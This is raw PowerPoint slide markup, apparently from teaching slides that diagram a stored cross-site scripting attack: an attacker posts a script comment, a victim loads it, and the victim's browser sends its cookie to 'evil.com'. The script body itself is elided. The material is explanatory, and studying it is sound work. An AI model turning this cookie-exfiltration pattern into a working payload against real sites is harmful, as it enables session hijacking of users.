            <a:ext cx="2593408" cy="92523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892801" y="3116038"/>
            <a:ext cx="660400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892801" y="3751299"/>
            <a:ext cx="1270000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606799" y="1967468"/>
            <a:ext cx="2150534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3065778" y="4040715"/>
            <a:ext cx="2573022" cy="78528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488265" y="4789238"/>
            <a:ext cx="3437467" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>http://example.com/DBcomment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524929" y="6306231"/>
            <a:ext cx="8805333" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=IuzU4y-UjLw&amp;feature=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2892703"/>
            <a:ext cx="2150534" cy="1933298"/>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47288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XSS Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="downloa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495" y="1501273"/>
            <a:ext cx="1391430" cy="1391430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="2892703"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2892703"/>
            <a:ext cx="2150534" cy="1933298"/>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757333" y="2523371"/>
            <a:ext cx="2150534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="downlo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2495" y="4040715"/>
            <a:ext cx="1293283" cy="1293283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="5333998"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163925" y="2336800"/>
            <a:ext cx="2593408" cy="92523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892801" y="3116038"/>
            <a:ext cx="660400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892801" y="3751299"/>
            <a:ext cx="1270000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606799" y="1967468"/>
            <a:ext cx="2150534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3065778" y="4040715"/>
            <a:ext cx="2573022" cy="78528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623731" y="4641221"/>
            <a:ext cx="3437467" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>http://example.com/DBcomment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5672668" y="4120631"/>
            <a:ext cx="2133599" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>Print DB comment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Elbow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5892801" y="4826000"/>
            <a:ext cx="1456267" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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825999" y="5661799"/>
            <a:ext cx="1066802" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524929" y="6306231"/>
            <a:ext cx="8805333" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=IuzU4y-UjLw&amp;feature=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177826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XSS Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="downloa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495" y="1501273"/>
            <a:ext cx="1391430" cy="1391430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="2892703"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2892703"/>
            <a:ext cx="2150534" cy="1933298"/>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757333" y="2523371"/>
            <a:ext cx="2150534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="downlo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2495" y="4040715"/>
            <a:ext cx="1293283" cy="1293283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="5333998"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163925" y="2336800"/>
            <a:ext cx="2593408" cy="92523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892801" y="3116038"/>
            <a:ext cx="660400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892801" y="3751299"/>
            <a:ext cx="1270000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606799" y="1967468"/>
            <a:ext cx="2150534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3065778" y="4040715"/>
            <a:ext cx="2573022" cy="78528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623731" y="4641221"/>
            <a:ext cx="3437467" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>http://example.com/DBconnect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5672668" y="4120631"/>
            <a:ext cx="2133599" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>Print DB comment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Elbow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5892801" y="4826000"/>
            <a:ext cx="1456267" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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825999" y="5661799"/>
            <a:ext cx="1066802" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1772495" y="3716085"/>
            <a:ext cx="0" cy="55534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69332" y="3077172"/>
            <a:ext cx="3437467" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" dirty="0" smtClean="0"/>
              <a:t>http://evil.com/cookie=1234</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524929" y="6306231"/>
            <a:ext cx="8805333" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=IuzU4y-UjLw&amp;feature=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8647137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t>Open Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="4832093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
